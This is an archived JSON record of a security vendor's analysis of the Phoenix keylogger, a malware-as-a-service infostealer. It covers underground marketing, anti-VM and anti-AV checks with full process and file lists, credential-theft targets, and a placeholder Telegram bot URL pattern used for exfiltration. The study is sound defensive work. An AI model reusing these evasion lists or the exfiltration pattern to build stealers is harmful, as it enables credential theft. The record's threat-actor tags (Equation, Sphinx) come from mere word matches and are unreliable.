{
	"id": "10604cd5-7664-4dfb-96c5-1e4d8c608a85",
	"created_at": "2026-04-06T00:17:27.563691Z",
	"updated_at": "2026-04-10T13:12:40.169409Z",
	"deleted_at": null,
	"sha1_hash": "08ea4174d948f00e4bccc4039f48cfae508156ae",
	"title": "Phoenix: The Tale of the Resurrected Keylogger",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4353027,
	"plain_text": "Phoenix: The Tale of the Resurrected Keylogger\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 18:12:38 UTC\r\nResearch by: Assaf Dahan\r\nIntroduction: Keylogger Malware\r\nCybereason’s Nocturnus team is tracking a new keylogger gaining traction among cybercriminals called Phoenix.\r\nThe keylogger first emerged in July 2019 packed with a myriad of information-stealing features. These features\r\nextend beyond solely logging keystrokes, to the point where we are inclined to classify it as an infostealer.\r\nThis research explains several aspects of the Phoenix keylogger, including:\r\n1. A Look Into the Underground Community: The underground, ongoing marketing efforts to promote\r\nPhoenix and its reception in the underground community.\r\n2. A Technical Breakdown: A technical breakdown of the Phoenix keylogger, including info stealing\r\ncapabilities, communication through Telegram, and potential persistence.\r\n3. The Connection to a Previous Keylogger: The discovery of the Phoenix keylogger’s connection to the\r\n“orphaned” Alpha keylogger.\r\nKey Findings\r\nThe Phoenix Keylogger: The Cybereason Nocturnus team is investigating multiple incidents of a new,\r\nemerging keylogger called Phoenix, and is now able to provide details into the keylogger’s operations and\r\nits creator.\r\nSteals Data From Multiple Sources: Phoenix operates under a malware-as-a-service model and steals\r\npersonal data from almost 20 different browsers, four different mail clients, FTP clients, and chat clients.\r\nTries to Stop over 80 Security Products: On top of its information stealing features, Phoenix has several\r\ndefensive and evasive mechanisms to avoid analysis and detection, including an Anti-AV module that tries\r\nto kill the processes of over 80 different security products and analysis tools.\r\nTargets Across Continents: Despite Phoenix having been released in July 2019, it has already targeted\r\nvictims across North America, the United Kingdom, France, Germany and other parts of Europe and the\r\nMiddle East. We expect more regions to be affected as it gains popularity.\r\nExfiltrates Data through Telegram: Phoenix offers common SMTP and FTP exfiltration protocols, but\r\nalso supports data exfiltration over Telegram. Telegram, a popular chat application worldwide, is leveraged\r\nby cybercriminals for its legitimacy and end-to-end encryption.\r\nHas the Same Author as the Alpha Keylogger: Phoenix was clearly authored by the same team behind\r\nthe Alpha keylogger, which disappeared earlier this year.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 1 of 26\n\n“Malware for the People”: This research showcases the ever-growing popularity of the Malware-as-a-Service model in the cybercrime ecosystem. Malware authors are developing malware that is easy for any\r\nuser to operate and comes bundled with customer support and a competitive price point. As we move into\r\n2020, we expect to see many less-technical cybercriminals leverage MaaS to commit cybercrime,\r\nespecially as MaaS authors start to compete for the most impressive offering.\r\nAdvanced endpoint protection platforms address these kinds of attacks. Learn about the future of EPPs during our\r\nwebinar. \r\nBackground: Phoenix Keylogger\r\nAt the end of July 2019, the Cybereason platform detected a malware sample that was classified by some antivirus\r\nvendors as Agent Tesla. Upon further review, however, it became clear that this was not Agent Tesla. We were able\r\nto determine this malware was a completely new and previously undocumented malware known as the Phoenix\r\nkeylogger.\r\nPhoenix MaaS Model Pricing\r\nPhoenix updated MaaS model pricing.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 2 of 26\n\nIn searching underground communities, we learned that Phoenix first emerged at the end of July in 2019. This\r\nkeylogger follows the malware as a service (MaaS) model and is sold for $14.99-$25.00 per month by a\r\ncommunity member with the handle Illusion.\r\nIllusion’s Join Date (24/07/2019)\r\nIllusion joined the underground community at the end of July 2019 and immediately began marketing the\r\nkeylogger. This behavior is somewhat unusual, as the underground community typically enforces a strict vetting\r\nprocess for members.\r\nReception in the Underground Community\r\nShortly after its launch, the Phoenix keylogger caught the attention of the underground community, with numerous\r\nmembers expressing interest in testing the product. The underground community views Phoenix quite favorably\r\nbecause of its stealing capabilities, stability, easy user interface, and customer support.\r\nExample #1: Extremely User Friendly with Documentation\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 3 of 26\n\nThis cybercriminal’s review expresses how easy Phoenix is to use. The in-depth review discusses documentation,\r\ncost, password recovery, and more - all items that are crucial to maintaining any SaaS.\r\nExample #2: Comes with a User Guide and Friendly\r\nThis cybercriminal’s review expresses how Phoenix comes with a user guide and friendly customer support.\r\nSpecifically, they state how the owner of Phoenix is more than willing to help users if they have questions.\r\nExample #3: 101% Support to Customers\r\nContinued validation of the quality customer support the owner of Phoenix provides.\r\nIllusion’s response to a request for features and recent updates to the changelog.\r\nReviews of the Phoenix keylogger draw a stark contrast with some MaaS products sold in hacker forums. They\r\npraise Illusion’s customer support and positive attitude toward the customer, as opposed to others in the\r\nunderground community who view their customers solely as cash-cows.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 4 of 26\n\nThese positive reviews suggest Phoenix’s potential for widespread use in the future. Like many modern MaaS,\r\nPhoenix gives non-technical and technical users alike easy access to damaging and exploitative software through\r\nthe proverbial swipe of a credit card. Phoenix is further proof of our ongoing belief that modern MaaS is creating\r\na new group of cybercriminals that profit off of other, less technical cybercriminals.\r\nFurther, Phoenix shows how some cybercriminals are following many of the same methodologies as legitimate\r\nsoftware-as-a-service (SaaS) businesses: marketing efforts, relying on positive reviews, responsive customer\r\nsupport, and regularly improving features in their product are hallmarks of a profitable SaaS.\r\nMalware Analysis\r\nMalware Capabilities\r\nThe Phoenix keylogger is written in VB.NET.\r\nPhoenix has a host of features that extend far beyond keylogging, including:\r\nKeylogger + Clipboard Stealer\r\nScreen Capture\r\nPassword Stealing (Browsers, Mail Clients, FTP clients, Chat Clients)\r\nData exfiltration via SMTP, FTP or Telegram\r\nDownloader (to download additional malware)\r\nAlleged AV-Killer Module\r\nAnti-debugging and Anti-VM Features\r\nDelivery Method\r\nBy default, Illusion supplies the Phoenix keylogger to their buyers as a stub. The buyer must use their own\r\nmethods to deliver the stub to the target machine. The majority of Phoenix infections we observe originate from\r\nphishing attempts that leverage a weaponized rich text file (RTF) or Microsoft Office document. These deliveries\r\ndo not use the more popular malicious macro technique, but instead use known exploits. Most commonly, they\r\nexploit the Equation Editor vulnerability (CVE-2017-11882).\r\nProcess tree of the Phoenix infection using a weaponized document.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 5 of 26\n\nInfected System Profiling\r\nOnce Phoenix successfully infects the target machine, it profiles the machine to gather information on the\r\noperating system, hardware, running processes, users, and its external IP. Phoenix stores the information in\r\nmemory and sends it back to the attackers directly, without writing it to disk. Attackers commonly do this to be\r\nmore stealthy, since it is harder to know what was exfiltrated if it is not written to disk.\r\nExample of system profiling data sent to the attackers.\r\nAnti-Analysis \u0026 Anti-Detection Features\r\nIt’s clear Illusion invested time and effort into protecting Phoenix, as the stub uses a few different methods to\r\nprotect itself from inspection.\r\nString Encryption: Most critical strings used by the malware are encrypted and only decrypted in\r\nmemory.\r\nObfuscation:The stub is obfuscated by what appears to be an implementation of the open source\r\nConfuserEx .NET obfuscator to hinder correct decompilation and code inspection.\r\nIllusion recommends using an additional third-party crypter to “make it FUD”, or fully undetectable. It is worth\r\nnoting that most Phoenix samples caught in the wild are packed with a crypter, but are still prevented by the\r\nmajority of antivirus vendors.\r\nAfter obtaining basic system information, Phoenix checks to see if it is running in a “hostile” environment. A\r\nhostile environment can take different forms: if Phoenix is deployed in a virtual machine, debugger, or on a\r\nmachine with analysis tools or antivirus products installed. Phoenix has a set of features to disable different\r\nWindows tools within the admin panel, like disabling CMD, the registry, task manager, system restore, and others.\r\nIt is interesting to note that even though the user interface used by Phoenix’s operators seems to have support for a\r\npersistence feature, most samples analyzed by Cybereason did not exhibit persistence behavior following a\r\nsuccessful infection. A possible explanation to this can lie in the attackers’ wish to minimize the risk of over\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 6 of 26\n\nexposure. Once Phoenix obtained the necessary data, there is no need for it to increase the risk of exposure by\r\npersisting longer than needed.\r\nThe Phoenix keylogger admin panel, with features to disable different tools.\r\nLet’s dive into some of the techniques Phoenix uses to detect a “hostile” environment.\r\nAnti-VM Module\r\nMost of Phoenix’s anti-VM checks are based on known techniques. Given the checks used and their order, we\r\nbelieve they were most likely copy-pasted from the Cyberbit blog. Phoenix performs the checks and terminates\r\nitself if it discovers any of the following processes or files in the target machine.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 7 of 26\n\nPhoenix checking for various running processes.\r\nChecking for running processes:\r\nSandboxieRpcSs\r\nVmtoolsd\r\nVmwaretrat\r\nVmwareuser\r\nVmacthlp\r\nVboxservice\r\nVboxtray\r\nChecking for the existence of the following files:\r\nc:\\windows\\System32\\Drivers\\VBoxMouse.sys\r\nc:\\windows\\System32\\Drivers\\vm3dgl.dll\r\nc:\\windows\\System32\\Drivers\\vmtray.dll\r\nc:\\windows\\System32\\Drivers\\VMToolshook.dll\r\nc:\\windows\\System32\\Drivers\\vmmousever.dll\r\nc:\\windows\\System32\\Drivers\\VBoxGuest.sys\r\nc:\\windows\\System32\\Drivers\\VBoxSF.sys\r\nc:\\windows\\System32\\Drivers\\VBoxVideo.sys\r\nc:\\windows\\System32\\VBoxService.exe\r\nDisabling Windows Defender\r\nPhoenix attempts to disable the Windows Defender AntiSpyware module by changing the following registry key.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 8 of 26\n\nPhoenix attempts to disable Windows Defender Antispyware.\r\nAnti-AV Module\r\nPhoenix’s anti-AV module tries to terminate the process of a vast number of security products.\r\nPhoenix terminating the process of different security products.\r\nSecurity Products Phoenix Attempts to Terminate:\r\nzlclient, egui, bdagent, npfmsg, olydbg, anubis, wireshark, avastui, _Avp32, vsmon, mbam, keyscrambler,\r\n_Avpcc, _Avpm, Ackwin32, Outpost, Anti-Trojan, ANTIVIR, Apvxdwin, ATRACK, Autodown, Avconsol, Ave32,\r\nAvgctrl, Avkserv, Avnt, Avp, Avp32, Avpcc, Avpdos32, Avpm, Avptc32, Avpupd, Avsched32, AVSYNMGR,\r\nAvwin95, Avwupd32, Blackd, Blackice, Cfiadmin, Cfiaudit, Cfinet, Cfinet32, Claw95, Claw95cf, Cleaner,\r\nCleaner3, Defwatch, Dvp95, Dvp95_0, Ecengine, Esafe, Espwatch, F-Agnt95, Findviru, Fprot, F-Prot, F-Prot95,\r\nFp-Win, Frw, F-Stopw, Iamapp, Iamserv, Ibmasn, Ibmavsp, Icload95, Icloadnt, Icmon, Icsupp95, Icsuppnt, Iface,\r\nIomon98, Jedi, Lockdown2000, Lookout, Luall, MCAFEE, Moolive, Mpftray, N32scanw, NAVAPSVC,\r\nNAVAPW32, NAVLU32, Navnt, NAVRUNR, Navw32, Navwnt, NeoWatch, NISSERV, Nisum, Nmain, Normist,\r\nNORTON, Nupgrade, Nvc95, Outpost, Padmin, Pavcl, Pavsched, Pavw, PCCIOMON, PCCMAIN, Pccwin98,\r\nPcfwallicon, Persfw, POP3TRAP, PVIEW95, Rav7, Rav7win, Rescue, Safeweb, Scan32, Scan95, Scanpm,\r\nScrscan, Serv95, Smc, SMCSERVICE, Snort, Sphinx, Sweep95, SYMPROXYSVC, Tbscan, Tca, Tds2-98, Tds2-\r\nNt, TermiNET, Vet95, Vettray, Vscan40, Vsecomr, Vshwin32, Vsstat, Webscanx, WEBTRAP, Wfindv32,\r\nZonealarm, LOCKDOWN2000, RESCUE32, LUCOMSERVER, avgcc, avgcc, avgamsvr, avgupsvc, avgw,\r\navgcc32, avgserv, avgserv9, avgserv9schedapp, avgemc, ashwebsv, ashdisp, ashmaisv, ashserv, aswUpdSv,\r\nsymwsc, norton, Norton Auto-Protect, norton_av, nortonav, ccsetmgr, ccevtmgr, avadmin, avcenter, avgnt,\r\navguard, avnotify, avscan, guardgui, nod32krn, nod32kui, clamscan, clamTray, clamWin, freshclam, oladdin,\r\nsigtool, w9xpopen, Wclose, cmgrdian, alogserv, mcshield, vshwin32, avconsol, vsstat, avsynmgr, avcmd,\r\navconfig, licmgr, sched, preupd, MsMpEng, MSASCui, Avira.Systray\r\nPhoenix’s Core Stealing Functionality\r\nOnce Phoenix finishes checking for a hostile environment, it executes several different stealing modules.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 9 of 26\n\nCredential Stealing\r\nPhoenix attempts to steal credentials and other sensitive information stored locally on the target machine by\r\nsearching for specific files or registry keys that contain sensitive information. It searches browsers, mail clients,\r\nFTP clients, and chat clients.\r\nBrowsers\r\nChrome, Firefox, Opera, Vivaldi, Brave, Blisk, Epic, Avast browser, SRware Iron, Comodo, Torch, Slimjet, UC\r\nbrowser, Orbitum, Coc Coc, QQ Browser, 360 Browser, Liebao\r\nMail Clients\r\nOutlook, Thunderbird, Seamonkey, Foxmail\r\nFTP Client\r\nFilezilla\r\nChat Clients\r\nPidgin\r\nExcerpt from Phoenix’s Outlook module\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 10 of 26\n\nExcerpt from Phoenix’s Pidgin module\r\nKeylogger Module\r\nPhoenix uses a common method of hooking keyboard events for its keylogging. It uses a Windows API function\r\nSetWindowsHookExA to map the pressed keys, then matches them to the corresponding process.\r\nExcerpt from Phoenix’s keylogger hooking function.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 11 of 26\n\nPhoenix keylogger functionality matching keystrokes to the relevant process.\r\nNetwork \u0026 C2 Communication\r\nPhoenix checks for Internet connectivity and obtains the external IP address of the target machine by sending a\r\nGET HTTP request to ifconfig.me, a known Internet service. This service gives Phoenix the external IP address of\r\nthe target machine, or terminates itself if there is no Internet connectivity.\r\nPhoenix determines the external IP of an infected machine using a legitimate web service\r\nPhoenix can post stolen data in cleartext over SMTP, FTP, or Telegram.\r\nSMTP Communication \u0026 Exfiltration\r\nFor the majority of cases, Phoenix posts the stolen data using the SMTP protocol. The stolen data is sent as an\r\nemail to an email address controlled by the attacker.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 12 of 26\n\nStolen browser data exfiltrated as an email message\r\nTelegram Communication \u0026 Exfiltration\r\nAlternatively, in some cases Phoenix exfiltrates data by abusing the API of the popular Telegram chat application.\r\nThis method of exfiltration is quite stealthy, since it abuses Telegram’s legitimate infrastructure. Other malware\r\nhave also started to use this technique, including the Masad Stealer.\r\nPhoenix sends an HTTP request to Telegram’s chat bot. This request includes the Telegram API key, chat ID, and\r\nthe stolen data is passed through the text parameter in URL encoding.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 13 of 26\n\nHTTP request sent to Telegram’s API extracted from memory.\r\nhttps://api[.]telegram[.]org/bot[ID]:[API_Token]/sendMessage?chat_id=[ID]\u0026text=[URL_ENCODED_TEXT]\r\nTelegram HTTP request pattern used by Phoenix\r\nURL decoded text posted to a Telegram bot.\r\nThe Telegram bot responds with the following details:\r\n{\"ok\":true,\"result\":{\"message_id\":[redacted],\"from\":{\"id\":[redacted],\"is_bot\":true,\"first_name\":\"[red\r\nThe stolen data is passed through Telegram, allowing the user to leverage a legitimate application for malicious\r\ncommunication and exfiltration.\r\nAdditional Communication with the C2 Server\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 14 of 26\n\nAt its current stage of development, Phoenix does not seem to use a standard, interactive C2 model. Specifically, it\r\ndoesn’t expect to receive commands back from the C2 server. Phoenix’s various tasks like infostealing,\r\ndownloading additional malware, and spreading via USB are predefined by the operators in the configuration file\r\nbefore compilation. Phoenix uses a predefined exfiltration method from the configuration file to steal any\r\ncollected data on execution.\r\nConnecting to Alpha Keylogger\r\nDuring our investigation, we discovered the Phoenix keylogger is actually an evolution of an earlier project, Alpha\r\nkeylogger. We believe the Alpha keylogger was authored by the same team behind the Phoenix keylogger.\r\nCode Similarity Between Alpha and Phoenix Keylogger\r\nIn order to investigate deeper, we used YARA rules and other methods to retrieve additional samples of Phoenix.\r\nOne of the samples we retrieved was almost identical to Phoenix, with some parts copy-pasted with the same\r\nnaming conventions, parameter names, and more. However, the name of the malware as it appeared in logs and in\r\ncode, was consistently Alpha keylogger.\r\nSimilarities Between INFO Schemes\r\nAlpha Keylogger Client INFO Scheme\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 15 of 26\n\nPhoenix Keylogger Client INFO Scheme\r\nSimilarities Between SMTP Configurations\r\nPhoenix Keylogger SMTP Configuration\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 16 of 26\n\nAlpha Keylogger SMTP Configuration\r\nSimilarities Between SMTP FUNCTIONS\r\nPhoenix Keylogger SMTP Function\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 17 of 26\n\nAlpha Keylogger SMTP Function\r\nSimilarities Between SELF-TERMINATION FUNCTIONS\r\nPhoenix Keylogger Self-termination Function\r\nAlpha Keylogger Self-termination Function\r\nAlpha Keylogger Overview\r\nIn searching the underground communities, we found references to the Alpha keylogger beginning as early as\r\nApril of 2019. At that time, member Alpha_Coder and later, member AK_Generation, began marketing the\r\nkeylogger to the underground community.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 18 of 26\n\nAlpha keylogger launched in April 2019 by Alpha_Coder.\r\nIn reviewing Alpha_Coder’s marketing materials, it is clear the two keyloggers are linked. They share the exact\r\nsame features, and the description of the features uses the exact same phrasing and even font.\r\nPhoenix Keylogger Marketing\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 19 of 26\n\nAlpha Keylogger Marketing\r\nIn addition, the design of the admin panel for the Alpha keylogger is very similar to the design of the admin panel\r\nfor the Phoenix keylogger.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 20 of 26\n\nAlpha Keylogger Admin Panel\r\nPhoenix Keylogger Admin Panel\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 21 of 26\n\nDisappearance of Alpha, Emergence of Phoenix\r\nIn the beginning of July 2019, the two members responsible for marketing the Alpha keylogger went completely\r\nsilent. This happened just before the emergence of the Phoenix keylogger at the end of July 2019.\r\nThe last message by Alpha_Coder from the beginning of July 2019.\r\nA potential buyer wonders whether the Alpha keylogger is still available.\r\nWhile it is not completely clear why the Alpha keylogger was abruptly shut down, chatter in the selling thread\r\ngives away potential clues. Alpha_Coder was banned from posting in the forum for one month, for reasons\r\nunknown. During that time, AK_Generation led marketing efforts for the Alpha keylogger.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 22 of 26\n\nAK_Generation marketing the Alpha keylogger.\r\nAK_Generation was created on April 27, 2019, the same day the Alpha keylogger was first promoted by\r\nAlpha_Coder. Interestingly, AK_Generation also disappeared close to the launch date of the Phoenix keylogger. It\r\nis likely that Alpha_Coder and AK_Generation are operated by the same person, and that AK_Generation was\r\ncreated as a backup account for Alpha_Coder.\r\nThe last time AK_Generation was seen on the underground community.\r\nWe believe the Phoenix keylogger is not just an evolution of the Alpha keylogger, but also an attempt to rebrand\r\nand give the author a clean slate in the underground community.\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 23 of 26\n\nConclusion\r\nThis research breaks down the Phoenix keylogger, an information stealer operating under a malware-as-a-service\r\nmodel, currently under active development. Since its emergence in late July 2019, it has gained popularity in the\r\nunderground community because of its ease of use, competitive pricing, and personal customer support.\r\nPhoenix is more than just a keylogger, with broad information-stealing capabilities, self-defense mechanisms,\r\nwhich include an anti-AV module that attempts to stop over 80 security products, and the ability to exfiltrate data\r\nthrough Telegram. The majority of samples we identified in the wild do not implement a persistence mechanism,\r\nnor do they interact bidirectionally with the C2 server. Instead, the stolen data is posted to a pre-configured\r\nexfiltration method, which suggests Phoenix is being used mostly as a “set it and forget it” type of malware.\r\nBased on our analysis, Phoenix’s malware-as-a-service model appeals to a broad range of cybercriminals,\r\nparticularly the less sophisticated who do not possess the technical know-how to develop their own successful\r\nmalware infrastructure. This signals a continued trend of cybercriminals following the malware-as-a-service\r\nmodel to make malware accessible for any level user. Malware authors are starting to use many of the same\r\nmethodologies as legitimate software-as-a-service businesses, including marketing their software, personalized\r\ncustomer support, and an easy user interface to continuously profit off of other, less technical cybercriminals.\r\nMoving into 2020, we expect a proliferation of less-technical cybercriminals to leverage MaaS to target, steal, and\r\nharm individuals, particularly as MaaS authors add additional features to their offerings.\r\nWant to hunt for these kind of threats? Check out our webinar to learn more about how to threat hunt.\r\nINDICATORS OF COMPROMISE\r\nFind the indicators of compromise for this attack here. \r\nMITRE ATT\u0026CK TECHNIQUES BREAKDOWN\r\nInitial\r\nAccess\r\nExecution\r\nDefense\r\nEvasion\r\nCredential\r\nAccess\r\nDiscovery Collection\r\nCommand\r\nand\r\nControl\r\nSpear\r\nPhishing\r\nAttachment\r\nExecution\r\nthrough\r\nAPI\r\nSoftware\r\nPacking\r\nCredentials\r\nfrom Web\r\nBrowsers\r\nSystem Time\r\nDiscovery\r\nData\r\nfrom\r\nLocal\r\nSystem\r\nRemote\r\nFile Copy\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 24 of 26\n\nCommand-Line\r\nInterface\r\nDeobfuscate\r\n/ Decode\r\nFiles or\r\nInformation\r\nCredentials\r\nin Files\r\nAccount\r\nDiscovery\r\nScreen\r\nCapture\r\nWeb\r\nService\r\n \r\nObfuscated\r\nFiles or\r\nInformation\r\nInput\r\nCapture\r\nFile and\r\nDirectory\r\nDiscovery\r\n     \r\nSystem\r\nInformation\r\nDiscovery\r\n \r\n     \r\nQuery\r\nRegistry\r\n     \r\nProcess\r\nDiscovery\r\n     \r\nSystem\r\nOwner/User\r\nDiscovery\r\n     \r\nSystem\r\nNetwork\r\nConfiguration\r\nDiscovery\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 25 of 26\n\nAbout the Author\r\nCybereason Nocturnus\r\n \r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government\r\nintelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing\r\nnew attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The\r\nCybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit\r\ncyberattacks.\r\nAll Posts by Cybereason Nocturnus\r\nSource: https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nhttps://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger\r\nPage 26 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger"
	],
	"report_names": [
		"phoenix-the-tale-of-the-resurrected-alpha-keylogger"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e90ec9cb-9959-455d-b558-4bafef64d645",
			"created_at": "2022-10-25T16:07:24.222081Z",
			"updated_at": "2026-04-10T02:00:04.903184Z",
			"deleted_at": null,
			"main_name": "Sphinx",
			"aliases": [
				"APT-C-15"
			],
			"source_name": "ETDA:Sphinx",
			"tools": [
				"AnubisSpy",
				"Backdoor.Oldrea",
				"Bladabindi",
				"Fertger",
				"Havex",
				"Havex RAT",
				"Jorik",
				"Oldrea",
				"PEACEPIPE",
				"njRAT",
				"yellowalbatross"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434647,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.pdf",
		"text": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.txt",
		"img": "https://archive.orkl.eu/08ea4174d948f00e4bccc4039f48cfae508156ae.jpg"
	}
}